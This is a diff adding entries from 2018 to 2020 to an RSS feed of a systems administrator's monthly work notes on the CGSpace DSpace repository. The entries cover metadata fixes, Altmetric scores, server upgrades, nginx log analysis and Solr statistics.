+&lt;li&gt;Maria asked me to update Charles Staver&amp;rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+&lt;ul&gt;
+&lt;li&gt;I updated the fifty-eight existing items on CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+&lt;ul&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/103225&#34;&gt;The first&lt;/a&gt; is still missing its DOI, so I added it and &lt;a href=&#34;https://twitter.com/mralanorth/status/1245632619661766657&#34;&gt;tweeted its handle&lt;/a&gt; (after a few hours there was a donut with score 222)&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/106899&#34;&gt;The second item&lt;/a&gt; now has a donut with score 2 since I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243158045540134913&#34;&gt;tweeted its handle&lt;/a&gt; last week&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/107258&#34;&gt;The third item&lt;/a&gt; now has a donut with score 1 since I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243158786392625153&#34;&gt;tweeted it&lt;/a&gt; last week&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;On the same note, the &lt;a href=&#34;https://hdl.handle.net/10568/106573&#34;&gt;one item&lt;/a&gt; Abenet pointed out last week now has a donut with score of 104 after I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243163710241345536&#34;&gt;tweeted it&lt;/a&gt; last week&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-03/</link>
+      <pubDate>Mon, 02 Mar 2020 12:31:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-03/</guid>
+      <description>&lt;h2 id=&#34;2020-03-02&#34;&gt;2020-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Update &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api&#34;&gt;dspace-statistics-api&lt;/a&gt; for DSpace 6+ UUIDs
+&lt;ul&gt;
+&lt;li&gt;Tag version 1.2.0 on GitHub&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased &lt;a href=&#34;https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059&#34;&gt;SolrUpgradePre6xStatistics.java&lt;/a&gt;
+&lt;ul&gt;
+&lt;li&gt;You need to download this into the DSpace 6.x source and compile it&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-02/</link>
+      <pubDate>Sun, 02 Feb 2020 11:56:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-02/</guid>
+      <description>&lt;h2 id=&#34;2020-02-02&#34;&gt;2020-02-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Continue working on porting CGSpace&amp;rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+&lt;ul&gt;
+&lt;li&gt;Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database&lt;/li&gt;
+&lt;li&gt;I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks&lt;/li&gt;
+&lt;li&gt;Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff&lt;/li&gt;
+&lt;li&gt;The code finally builds and runs with a fresh install&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-01/</link>
+      <pubDate>Mon, 06 Jan 2020 10:48:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-01/</guid>
+      <description>&lt;h2 id=&#34;2020-01-06&#34;&gt;2020-01-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Open &lt;a href=&#34;https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706&#34;&gt;a ticket&lt;/a&gt; with Atmire to request a quote for the upgrade to DSpace 6&lt;/li&gt;
+&lt;li&gt;Last week Altmetric responded about the &lt;a href=&#34;https://hdl.handle.net/10568/97087&#34;&gt;item&lt;/a&gt; that had a lower score than than its DOI
+&lt;ul&gt;
+&lt;li&gt;The score is now linked to the DOI&lt;/li&gt;
+&lt;li&gt;Another &lt;a href=&#34;https://hdl.handle.net/10568/91278&#34;&gt;item&lt;/a&gt; that had the same problem in 2019 has now also linked to the score for its DOI&lt;/li&gt;
+&lt;li&gt;Another &lt;a href=&#34;https://hdl.handle.net/10568/81236&#34;&gt;item&lt;/a&gt; that had the same problem in 2019 has also been fixed&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2020-01-07&#34;&gt;2020-01-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter Ballantyne highlighted one more WLE &lt;a href=&#34;https://hdl.handle.net/10568/101286&#34;&gt;item&lt;/a&gt; that is missing the Altmetric score that its DOI has
+&lt;ul&gt;
+&lt;li&gt;The DOI has a score of 259, but the Handle has no score at all&lt;/li&gt;
+&lt;li&gt;I &lt;a href=&#34;https://twitter.com/mralanorth/status/1214471427157626881&#34;&gt;tweeted&lt;/a&gt; the CGSpace repository link&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-12/</link>
+      <pubDate>Sun, 01 Dec 2019 11:22:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-12/</guid>
+      <description>&lt;h2 id=&#34;2019-12-01&#34;&gt;2019-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Upgrade CGSpace (linode18) to Ubuntu 18.04:
+&lt;ul&gt;
+&lt;li&gt;Check any packages that have residual configs and purge them:&lt;/li&gt;
+&lt;li&gt;&lt;!-- raw HTML omitted --&gt;# dpkg -l | grep -E &amp;lsquo;^rc&amp;rsquo; | awk &amp;lsquo;{print $2}&amp;rsquo; | xargs dpkg -P&lt;!-- raw HTML omitted --&gt;&lt;/li&gt;
+&lt;li&gt;Make sure all packages are up to date and the package manager is up to date, then reboot:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# apt update &amp;amp;&amp;amp; apt full-upgrade
+# apt-get autoremove &amp;amp;&amp;amp; apt-get autoclean
+# dpkg -C
+# reboot
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-11/</link>
+      <pubDate>Mon, 04 Nov 2019 12:20:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-11/</guid>
+      <description>&lt;h2 id=&#34;2019-11-04&#34;&gt;2019-11-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+&lt;ul&gt;
+&lt;li&gt;I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+1277694
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;So 4.6 million from XMLUI and another 1.2 million from API requests&lt;/li&gt;
+&lt;li&gt;Let&amp;rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34; | grep -c -E &amp;#34;/rest/bitstreams&amp;#34;
+106781
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-10/</link>
+      <pubDate>Tue, 01 Oct 2019 13:20:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-10/</guid>
+      <description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &amp;#39;id,dc.</description>
+    </item>
+    
+    <item>
+      <title>September, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-09/</link>
+      <pubDate>Sun, 01 Sep 2019 10:17:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-09/</guid>
+      <description>&lt;h2 id=&#34;2019-09-01&#34;&gt;2019-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning&lt;/li&gt;
+&lt;li&gt;Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-08/</link>
+      <pubDate>Sat, 03 Aug 2019 12:39:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-08/</guid>
+      <description>&lt;h2 id=&#34;2019-08-03&#34;&gt;2019-08-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Look at Bioversity&amp;rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2019-08-04&#34;&gt;2019-08-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Deploy ORCID identifier updates requested by Bioversity to CGSpace&lt;/li&gt;
+&lt;li&gt;Run system updates on CGSpace (linode18) and reboot it
+&lt;ul&gt;
+&lt;li&gt;Before updating it I checked Solr and verified that all statistics cores were loaded properly&amp;hellip;&lt;/li&gt;
+&lt;li&gt;After rebooting, all statistics cores were loaded&amp;hellip; wow, that&amp;rsquo;s lucky.&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Run system updates on DSpace Test (linode19) and reboot it&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-07/</link>
+      <pubDate>Mon, 01 Jul 2019 12:13:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-07/</guid>
+      <description>&lt;h2 id=&#34;2019-07-01&#34;&gt;2019-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Create an &amp;ldquo;AfricaRice books and book chapters&amp;rdquo; collection on CGSpace for AfricaRice&lt;/li&gt;
+&lt;li&gt;Last month Sisay asked why the following &amp;ldquo;most popular&amp;rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+&lt;ul&gt;
+&lt;li&gt;&lt;a href=&#34;https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;amp;time_filter_end_date=01%2F12%2F2018&#34;&gt;DSpace Test&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;amp;time_filter_end_date=01%2F12%2F2018&#34;&gt;CGSpace&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-06/</link>
+      <pubDate>Sun, 02 Jun 2019 10:57:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-06/</guid>
+      <description>&lt;h2 id=&#34;2019-06-02&#34;&gt;2019-06-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge the &lt;a href=&#34;https://github.com/ilri/DSpace/pull/425&#34;&gt;Solr filterCache&lt;/a&gt; and &lt;a href=&#34;https://github.com/ilri/DSpace/pull/426&#34;&gt;XMLUI ISI journal&lt;/a&gt; changes to the &lt;code&gt;5_x-prod&lt;/code&gt; branch and deploy on CGSpace&lt;/li&gt;
+&lt;li&gt;Run system updates on CGSpace (linode18) and reboot it&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2019-06-03&#34;&gt;2019-06-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Skype with Marie-Angélique and Abenet about &lt;a href=&#34;https://agriculturalsemantics.github.io/cg-core/cgcore.html&#34;&gt;CG Core v2&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-05/</link>
+      <pubDate>Wed, 01 May 2019 07:37:43 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-05/</guid>
+      <description>&lt;h2 id=&#34;2019-05-01&#34;&gt;2019-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace&lt;/li&gt;
+&lt;li&gt;A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+&lt;ul&gt;
+&lt;li&gt;Apparently if the item is in the &lt;code&gt;workflowitem&lt;/code&gt; table it is submitted to a workflow&lt;/li&gt;
+&lt;li&gt;And if it is in the &lt;code&gt;workspaceitem&lt;/code&gt; table it is in the pre-submitted state&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;The item seems to be in a pre-submitted state, so I tried to delete it from there:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;But after this I tried to delete the item from the XMLUI and it is &lt;em&gt;still&lt;/em&gt; present&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-04/</link>
+      <pubDate>Mon, 01 Apr 2019 09:00:43 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-04/</guid>
+      <description>&lt;h2 id=&#34;2019-04-01&#34;&gt;2019-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+&lt;ul&gt;
+&lt;li&gt;They asked if we had plans to enable RDF support in CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+&lt;ul&gt;
+&lt;li&gt;I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &amp;#39;Spore-192-EN-web.pdf&amp;#39; | grep -E &amp;#39;(18.196.196.108|18.195.78.144|18.195.218.6)&amp;#39; | awk &amp;#39;{print $9}&amp;#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;In the last two weeks there have been 47,000 downloads of this &lt;em&gt;same exact PDF&lt;/em&gt; by these three IP addresses&lt;/li&gt;
+&lt;li&gt;Apply country and region corrections and deletions on DSpace Test and CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 231 -f cg.coverage.region -d
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-03/</link>
+      <pubDate>Fri, 01 Mar 2019 12:16:30 +0100</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-03/</guid>
+      <description>&lt;h2 id=&#34;2019-03-01&#34;&gt;2019-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I checked IITA&amp;rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&amp;rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good&lt;/li&gt;
+&lt;li&gt;I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Looking at the other half of Udana&amp;rsquo;s WLE records from 2018-11
+&lt;ul&gt;
+&lt;li&gt;I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)&lt;/li&gt;
+&lt;li&gt;I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items&lt;/li&gt;
+&lt;li&gt;Most worryingly, there are encoding errors in the abstracts for eleven items, for example:&lt;/li&gt;
+&lt;li&gt;68.15% � 9.45 instead of 68.15% ± 9.45&lt;/li&gt;
+&lt;li&gt;2003�2013 instead of 2003–2013&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-02/</link>
+      <pubDate>Fri, 01 Feb 2019 21:37:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-02/</guid>
+      <description>&lt;h2 id=&#34;2019-02-01&#34;&gt;2019-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!&lt;/li&gt;
+&lt;li&gt;The top IPs before, during, and after this latest alert tonight were:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;01/Feb/2019:(17|18|19|20|21)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;&lt;code&gt;85.25.237.71&lt;/code&gt; is the &amp;ldquo;Linguee Bot&amp;rdquo; that I first saw last month&lt;/li&gt;
+&lt;li&gt;The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase&lt;/li&gt;
+&lt;li&gt;There were just over 3 million accesses in the nginx logs last month:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;#34;[0-9]{1,2}/Jan/2019&amp;#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-01/</link>
+      <pubDate>Wed, 02 Jan 2019 09:48:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-01/</guid>
+      <description>&lt;h2 id=&#34;2019-01-02&#34;&gt;2019-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning&lt;/li&gt;
+&lt;li&gt;I don&amp;rsquo;t see anything interesting in the web server logs around that time though:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;02/Jan/2019:0(1|2|3)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-12/</link>
+      <pubDate>Sun, 02 Dec 2018 02:09:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-12/</guid>
+      <description>&lt;h2 id=&#34;2018-12-01&#34;&gt;2018-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK&lt;/li&gt;
+&lt;li&gt;I manually installed OpenJDK, then removed Oracle JDK, then re-ran the &lt;a href=&#34;http://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible playbook&lt;/a&gt; to update all configuration files, etc&lt;/li&gt;
+&lt;li&gt;Then I ran all system updates and restarted the server&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2018-12-02&#34;&gt;2018-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another &lt;a href=&#34;https://usn.ubuntu.com/3831-1/&#34;&gt;Ghostscript vulnerability last week&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-11/</link>
+      <pubDate>Thu, 01 Nov 2018 16:41:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-11/</guid>
+      <description>&lt;h2 id=&#34;2018-11-01&#34;&gt;2018-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Finalize AReS Phase I and Phase II ToRs&lt;/li&gt;
+&lt;li&gt;Send a note about my &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api&#34;&gt;dspace-statistics-api&lt;/a&gt; to the dspace-tech mailing list&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2018-11-03&#34;&gt;2018-11-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage&lt;/li&gt;
+&lt;li&gt;Today these are the top 10 IPs:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-10/</link>
+      <pubDate>Mon, 01 Oct 2018 22:31:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-10/</guid>
+      <description>&lt;h2 id=&#34;2018-10-01&#34;&gt;2018-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items&lt;/li&gt;
+&lt;li&gt;I created a GitHub issue to track this &lt;a href=&#34;https://github.com/ilri/DSpace/issues/389&#34;&gt;#389&lt;/a&gt;, because I&amp;rsquo;m super busy in Nairobi right now&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-09/</link>
+      <pubDate>Sun, 02 Sep 2018 09:55:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-09/</guid>
+      <description>&lt;h2 id=&#34;2018-09-02&#34;&gt;2018-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;New &lt;a href=&#34;https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5&#34;&gt;PostgreSQL JDBC driver version 42.2.5&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;ll update the DSpace role in our &lt;a href=&#34;https://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible infrastructure playbooks&lt;/a&gt; and run the updated playbooks on CGSpace and DSpace Test&lt;/li&gt;
+&lt;li&gt;Also, I&amp;rsquo;ll re-run the &lt;code&gt;postgresql&lt;/code&gt; tasks because the custom PostgreSQL variables are dynamic according to the system&amp;rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&amp;rsquo;m getting those autowire errors in Tomcat 8.5.30 again:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-08/</link>
+      <pubDate>Wed, 01 Aug 2018 11:52:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-08/</guid>
+      <description>&lt;h2 id=&#34;2018-08-01&#34;&gt;2018-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;DSpace Test had crashed at some point yesterday morning and I see the following in &lt;code&gt;dmesg&lt;/code&gt;:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight&lt;/li&gt;
+&lt;li&gt;From the DSpace log I see that eventually Solr stopped responding, so I guess the &lt;code&gt;java&lt;/code&gt; process that was OOM killed above was Tomcat&amp;rsquo;s&lt;/li&gt;
